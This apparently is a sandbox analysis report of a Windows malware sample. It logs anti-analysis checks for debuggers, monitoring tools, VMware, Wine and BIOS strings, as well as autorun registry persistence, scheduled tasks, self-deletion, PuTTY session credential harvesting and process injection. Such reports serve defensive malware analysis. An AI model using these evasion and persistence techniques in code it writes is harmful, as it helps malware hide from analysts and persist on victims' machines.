FindWindowA May 4, 2025, 12:45 p.m.	class_name: RegmonClass window_name:		0	0
FindWindowA May 4, 2025, 12:45 p.m.	class_name: #0 window_name: Registry Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA May 4, 2025, 12:45 p.m.	class_name: 18467-41 window_name:		0	0
FindWindowA May 4, 2025, 12:45 p.m.	class_name: FilemonClass window_name:		0	0
FindWindowA May 4, 2025, 12:45 p.m.	class_name: FilemonClass window_name:		0	0
FindWindowA May 4, 2025, 12:45 p.m.	class_name: #0 window_name: File Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA May 4, 2025, 12:45 p.m.	class_name: PROCMON_WINDOW_CLASS window_name:		0	0
FindWindowA May 4, 2025, 12:45 p.m.	class_name: #0 window_name: Process Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA May 4, 2025, 12:45 p.m.	class_name: OLLYDBG window_name:		0	0
FindWindowA May 4, 2025, 12:45 p.m.	class_name: GBDYLLO window_name:		0	0
FindWindowA May 4, 2025, 12:45 p.m.	class_name: pediy06 window_name:		0	0
FindWindowA May 4, 2025, 12:45 p.m.	class_name: FilemonClass window_name:		0	0
FindWindowA May 4, 2025, 12:45 p.m.	class_name: FilemonClass window_name:		0	0
FindWindowA May 4, 2025, 12:45 p.m.	class_name: #0 window_name: File Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA May 4, 2025, 12:45 p.m.	class_name: PROCMON_WINDOW_CLASS window_name:		0	0
FindWindowA May 4, 2025, 12:45 p.m.	class_name: #0 window_name: Process Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA May 4, 2025, 12:45 p.m.	class_name: RegmonClass window_name:		0	0
FindWindowA May 4, 2025, 12:45 p.m.	class_name: RegmonClass window_name:		0	0
FindWindowA May 4, 2025, 12:45 p.m.	class_name: #0 window_name: Registry Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA May 4, 2025, 12:45 p.m.	class_name: 18467-41 window_name:		0	0
FindWindowA May 4, 2025, 12:45 p.m.	class_name: FilemonClass window_name:		0	0
FindWindowA May 4, 2025, 12:45 p.m.	class_name: FilemonClass window_name:		0	0
FindWindowA May 4, 2025, 12:45 p.m.	class_name: #0 window_name: File Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA May 4, 2025, 12:45 p.m.	class_name: PROCMON_WINDOW_CLASS window_name:		0	0
FindWindowA May 4, 2025, 12:45 p.m.	class_name: #0 window_name: Process Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA May 4, 2025, 12:46 p.m.	class_name: OLLYDBG window_name:		0	0
FindWindowA May 4, 2025, 12:46 p.m.	class_name: GBDYLLO window_name:		0	0
FindWindowA May 4, 2025, 12:46 p.m.	class_name: pediy06 window_name:		0	0
FindWindowA May 4, 2025, 12:46 p.m.	class_name: FilemonClass window_name:		0	0
FindWindowA May 4, 2025, 12:46 p.m.	class_name: FilemonClass window_name:		0	0
FindWindowA May 4, 2025, 12:46 p.m.	class_name: #0 window_name: File Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA May 4, 2025, 12:46 p.m.	class_name: PROCMON_WINDOW_CLASS window_name:		0	0
FindWindowA May 4, 2025, 12:46 p.m.	class_name: #0 window_name: Process Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA May 4, 2025, 12:46 p.m.	class_name: RegmonClass window_name:		0	0
FindWindowA May 4, 2025, 12:46 p.m.	class_name: RegmonClass window_name:		0	0
FindWindowA May 4, 2025, 12:46 p.m.	class_name: #0 window_name: Registry Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA May 4, 2025, 12:46 p.m.	class_name: 18467-41 window_name:		0	0
FindWindowA May 4, 2025, 12:46 p.m.	class_name: FilemonClass window_name:		0	0
FindWindowA May 4, 2025, 12:46 p.m.	class_name: FilemonClass window_name:		0	0
FindWindowA May 4, 2025, 12:46 p.m.	class_name: #0 window_name: File Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA May 4, 2025, 12:46 p.m.	class_name: PROCMON_WINDOW_CLASS window_name:		0	0

Checks the version of Bios, possibly for anti-virtualization (2 events)

registry	HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion
registry	HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion

Installs itself for autorun at Windows startup (6 events)

reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0	reg_value	rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP000.TMP\"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1	reg_value	rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP001.TMP\"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\2d05347e68.exe	reg_value	C:\Users\test22\AppData\Local\Temp\10020170101\2d05347e68.exe
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0	reg_value	rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP000.TMP\"
file	C:\Windows\Tasks\ramez.job
file	C:\Windows\Tasks\taren.job

Deletes executed files from disk (1 event)

file	C:\Users\test22\AppData\Local\Temp\is-6FDHC.tmp\a3e8f181a3.tmp

Harvests credentials from local FTP client softwares (1 event)

registry

HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions

Putty Files, Registry Keys and/or Mutexes Detected

A process performed obfuscation on information about the computer or sent it to a remote location indicative of CnC Traffic/Preperations. (5 events)

Time & API	Arguments	Status	Return
CryptHashData May 4, 2025, 12:38 p.m.	buffer: 127631360test22TEST22-PCMicrosoft Windows NT 6.1.7601 Service Pack 134252779520 hash_handle: 0x00000000020712e0 flags: 0	1	1
CryptHashData May 4, 2025, 12:38 p.m.	buffer: 127631360test22TEST22-PCMicrosoft Windows NT 6.1.7601 Service Pack 134252779520 hash_handle: 0x00000000020712e0 flags: 0	1	1
CryptHashData May 4, 2025, 12:38 p.m.	buffer: 127631360test22TEST22-PCMicrosoft Windows NT 6.1.7601 Service Pack 134252779520 hash_handle: 0x00000000020712e0 flags: 0	1	1
CryptHashData May 4, 2025, 12:38 p.m.	buffer: 127631360test22TEST22-PCMicrosoft Windows NT 6.1.7601 Service Pack 134252779520 hash_handle: 0x00000000020712e0 flags: 0	1	1
CryptHashData May 4, 2025, 12:38 p.m.	buffer: 127631360test22TEST22-PCMicrosoft Windows NT 6.1.7601 Service Pack 134252779520 hash_handle: 0x00000000020712e0 flags: 0	1	1

Resumed a suspended thread in a remote process potentially indicative of process injection (12 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2792 resumed a thread in remote process 2904
Process injection	Process 2256 resumed a thread in remote process 2356
Process injection	Process 2356 resumed a thread in remote process 2748
Process injection	Process 4184 resumed a thread in remote process 4272
Process injection	Process 4608 resumed a thread in remote process 4692
Process injection	Process 4692 resumed a thread in remote process 4836
NtResumeThread May 4, 2025, 12:45 p.m.	thread_handle: 0x00000138 suspend_count: 0 process_identifier: 2904	1	0	0
NtResumeThread May 4, 2025, 12:38 p.m.	thread_handle: 0x000000000000014c suspend_count: 1 process_identifier: 2356	1	0	0
NtResumeThread May 4, 2025, 12:38 p.m.	thread_handle: 0x0000000000000074 suspend_count: 0 process_identifier: 2748	1	0	0
NtResumeThread May 4, 2025, 12:45 p.m.	thread_handle: 0x00000138 suspend_count: 0 process_identifier: 4272	1	0	0
NtResumeThread May 4, 2025, 12:46 p.m.	thread_handle: 0x000000000000014c suspend_count: 1 process_identifier: 4692	1	0	0
NtResumeThread May 4, 2025, 12:46 p.m.	thread_handle: 0x0000000000000074 suspend_count: 0 process_identifier: 4836	1	0	0

Creates known SpyNet files, registry changes and/or mutexes. (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\SpyNet

Detects VMWare through the in instruction feature (1 event)

Time & API	Arguments	Status	Return	Repeated
__exception__ May 4, 2025, 12:45 p.m.	stacktrace: exception.instruction_r: ed 64 8f 05 00 00 00 00 56 89 14 24 50 89 24 24 exception.symbol: 3v57i+0x1e4cc4 exception.instruction: in eax, dx exception.module: 3v57I.exe exception.exception_code: 0xc0000096 exception.offset: 1985732 exception.address: 0xb04cc4 registers.esp: 1571408 registers.edi: 1114345 registers.eax: 1447909480 registers.ebp: 3999985684 registers.edx: 22104 registers.ebx: 1969033397 registers.esi: 11534730 registers.ecx: 20	1	0	0

Detects the presence of Wine emulator (2 events)

Time & API	Arguments	Status	Return	Repeated
LdrGetProcedureAddress May 4, 2025, 12:46 p.m.	ordinal: 0 function_address: 0x00e5f7a8 function_name: wine_get_version module: ntdll module_address: 0x76f10000		3221225785	0
LdrGetProcedureAddress May 4, 2025, 12:46 p.m.	ordinal: 0 function_address: 0x002f17dc function_name: wine_get_version module: ntdll module_address: 0x76f10000		3221225785	0

download.php

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All